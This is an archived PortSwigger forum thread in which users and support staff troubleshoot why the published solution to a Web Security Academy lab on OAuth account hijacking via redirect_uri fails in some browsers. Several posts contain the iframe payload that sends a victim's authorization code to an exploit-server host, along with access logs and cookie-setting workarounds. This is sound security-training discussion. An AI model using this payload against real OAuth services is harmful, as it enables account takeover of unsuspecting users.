Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Issues on the proposed solution to Lab: OAuth account hijacking via redirect_uri

Samuele | Last updated: May 15, 2024 04:58PM UTC

We tried to solve https://portswigger.net/web-security/oauth/lab-oauth-account-hijacking-via-redirect-uri using the proposed solution. In particular, to steal the authorization code, such solution specifies to have the exploit server to return to the victim a page with an iframe that refers to the authorization request URL, with redirect_uri referring to the exploit server. However, this solution didn't work for us: the OAuth server returns a "SessionNotFound: invalid_request" error message within the iframe after trying to self-attack through the "view exploit" feature. Finally, we managed to steal the authorization code by redirecting the victim (via a "301 Found" HTTP response) from the exploit server to the authorization request URL. We used the latest version of the Burp suite to solve the lab. Additionally, we believe that the exploit code template described in the proposed solution contains an inaccuracy. Currently, the exploit code is: <iframe src="https://oauth-your-lab-oauth-server-id.oauth-server.net/auth?client_id=YOUR-LAB-CLIENT-ID&redirect_uri=https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net&response_type=code&scope=openid%20profile%20email"></iframe> but it should be (note the addition of the "exploit-" prefix in the hostname of the redirect_uri): <iframe src="https://oauth-your-lab-oauth-server-id.oauth-server.net/auth?client_id=YOUR-LAB-CLIENT-ID&redirect_uri=https://exploit-YOUR-EXPLOIT-SERVER-ID.exploit-server.net&response_type=code&scope=openid%20profile%20email"></iframe>

Ben, PortSwigger Agent | Last updated: May 16, 2024 01:11PM UTC

Hi Samuele, Which browser are you using when you attempt this particular lab? This may or may not be clear within the solution itself but the <YOUR-EXPLOIT-SERVER-ID> would, from our point of view, also include the 'exploit-' prefix of the URL.

Samuele | Last updated: May 16, 2024 04:21PM UTC

Thank you for the reply. I am using Chromium 124.0.6367.118 embedded in the Burp Suite Community Edition v2024.3.1.4. Regarding the "exploit-" prefix, the final exploit must include it. However, since the solution includes "oauth-" before <YOUR-LAB-OAUTH-SERVER-ID>, we believe that it would have been more consistent to also include "exploit-" before <YOUR-EXPLOIT-SERVER-ID>. Anyway, that's just my opinion.

Ben, PortSwigger Agent | Last updated: May 17, 2024 10:02AM UTC

Hi Samuele, If you use a standard version of Chrome (rather than the embedded browser) are you able to solve the lab using the written solution provided? We can certainly pass that feedback on to the content team so that they are aware the required URL may not be immediately obvious to all users.

Samuele | Last updated: May 17, 2024 12:51PM UTC

I tried to solve the lab using the proposed solution on the official build of Chrome 124.0.6367.209, the problem persists.

Ben, PortSwigger Agent | Last updated: May 17, 2024 01:20PM UTC

Hi Samuele, Are you able to email us at support@portswigger.net and include a screenshot of the exploit you are using and what you see in the access logs? I am able to get both the 'View exploit' and 'Deliver to victim' functionality to work using a standard version of Chrome so it would be useful to see exactly what you are doing.

Samuele | Last updated: May 20, 2024 05:40PM UTC

I think I've found the cause of the issue. Both in Burp's embedded Chromium and official Chrome build (I tested in incognito mode - sorry for the inconvenience), the "_session" cookie is not sent along the "/auth" request within the iframe (proposed solution), while it is sent when the top-level frame is redirected (my solution). The proposed solution works fine in normal (non-incognito) mode using the official Chrome build.

Dominic | Last updated: Jun 27, 2024 05:31PM UTC

I am also getting the "SessionNotFound: invalid_request" error message when viewing the iFrame exploit. Thus, the access logs only show my requests and no access logs from the victim. I tried in both Chrome and Burp's embedded browser.

Ben, PortSwigger Agent | Last updated: Jun 28, 2024 07:53AM UTC

Hi Dominic, If you use a standard version of Chrome (rather than the embedded browser or Firefox) does this allow you to solve the lab using the written solution?

Carlos | Last updated: Jul 01, 2024 05:38PM UTC

Hi Ben, I can confirm you that the exploit IS NOT WORKING on Chrome / Chromium. How we can proceed? Thanks in advance!

Ben, PortSwigger Agent | Last updated: Jul 02, 2024 08:36AM UTC

Hi Carlos, If you carry out the following in the embedded browser (obviously, this is allowing the use of third party cookies from the Web Academy environment so please make sure that you are happy with this approach before altering this setting), does this then allow you to solve the lab: 1. Navigate to "Privacy and security --> Tracking Protection". 2. Add "https://[*.]exploit-server.net" to the "Sites allowed to use third-party cookies".

Andre | Last updated: Jul 24, 2024 07:01PM UTC

I am able to view the code in the logs when I click view exploit. But when I send the explploit to the victim, I don't receive any code. I have tried in chrome from burp, regular chrome, edge, firefox. I have added "https://[*.]exploit-server.net" to the "Sites allowed to use third-party cookies". Any other things I can try? I have followed the steps exactly as they are listed in the solution. <iframe src="https://oauth-0a2d000004fe8d3c86f15146028d0000.oauth-server.net/auth?client_id=y9epqf6ww2rofxfxkkljw&redirect_uri=https://exploit-0a22005404b58d9986eb520b01e900a2.exploit-server.net&response_type=code&scope=openid%20profile%20email"></iframe>

Ben, PortSwigger Agent | Last updated: Jul 25, 2024 08:39AM UTC

Hi Andre, We have received your email about this so we will respond to you from there.

pascu | Last updated: Aug 20, 2024 06:06PM UTC

I have the same problem. What was the solution in the end?

Dominyque, PortSwigger Agent | Last updated: Aug 21, 2024 10:06AM UTC

Hi Pascu, Which browser are you using to attempt the lab? Can you please send us the exploit you are using?

V01D | Last updated: Sep 24, 2024 02:17PM UTC

i have the same problem as Andre I am able to view the code in the logs when I click view exploit. But when I send the exploit to the victim, I don't receive any code. I have tried in chrome from burp, regular chrome, edge, firefox. I have added "https://[*.]exploit-server.net" to the "Sites allowed to use third-party cookies". I have followed the steps exactly as they are listed in the solution. <iframe src="https://oauth-0a41001f0311644e864f29d00246001c.oauth-server.net/auth?client_id=hqmc33df29hnj0y8oiurl&redirect_uri=https://exploit-0a8600e303ff64d886fe2a6401d000c1.exploit-server.net&response_type=code&scope=openid%20profile%20email"></iframe>

Ben, PortSwigger Agent | Last updated: Sep 26, 2024 06:27AM UTC

Hi, If you attempt this lab across multiple different lab instances (so let the lab expire and then relaunch the lab so that you get a different URL) is this behaviour consistent across all instances?

V01D | Last updated: Sep 28, 2024 03:51PM UTC

Hi Ben, Yes I have tried it across multiple lab instance, in fact, for a span of 2 days I have waited for 6-7 lab instances. Its always the same result (I can see the code using "view exploit" but not "Deliver to victim"

Ben, PortSwigger Agent | Last updated: Sep 30, 2024 12:12PM UTC

Hi, I have just attempted this particular lab (as of right now) and was able to solve it using the embedded browser in the latest version of Burp. We have been experiencing some intermittent issues with the labs that might have impacted you with this (this was the reason I suggested attempting this more than once).

V01D | Last updated: Oct 01, 2024 07:00AM UTC

HI Ben, i have tried using Http to pull, but have no luck. As i am attempting the lab, only using "view exploit" was able to give me the code (my current session), when I tried "Deliver to victim", the lab return "302 Found" and nothing else. hope this help

James | Last updated: Oct 10, 2024 09:45AM UTC

It doesn’t work for me either, I’ve been coming back for 4 hours straight. Stop asking everyone what browser they have and do something about this damn lab. This is not normal.

Ben, PortSwigger Agent | Last updated: Oct 10, 2024 01:24PM UTC

Good afternoon James, Thank you for your input. Again, I have just attempted this lab and been able to solve it using the written solution so the behaviour that you are observing does not appear to be that consistent across all users which makes it hard to track down whether there is an issue and what might be the cause. Are you able to successfully test this on yourself using the 'view exploit' functionality? When you deliver it to the victim, are you seeing any activity from the victim at all?

Olaf | Last updated: Oct 18, 2024 02:11PM UTC

I can confirm that this lab still doesn't work. I use the built-in Chromium webbrowser from Burp and in the access logs I get: 157.97.115.170 2024-10-18 14:04:30 +0000 "GET /deliver-to-victim HTTP/1.1" 302 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36" 10.0.4.234 2024-10-18 14:04:30 +0000 "GET /exploit/ HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 157.97.115.170 2024-10-18 14:04:30 +0000 "GET / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36" 157.97.115.170 2024-10-18 14:04:30 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36" So I get no authorization code at all, while by viewing the exploit I do get one, but from myself. I know the victim is there cause of the different IP. Here is the exploit payload I used: <iframe src="https://oauth-0abc00130474ea7980bde2a8029a0097.oauth-server.net/auth?client_id=xdyj1ydq5q26nhrm7y37a&redirect_uri=https://exploit-0a9c007c0427ea5c8003e30401ee00d4.exploit-server.net&response_type=code&scope=openid%20profile%20email"></iframe>

Ben, PortSwigger Agent | Last updated: Oct 21, 2024 12:10PM UTC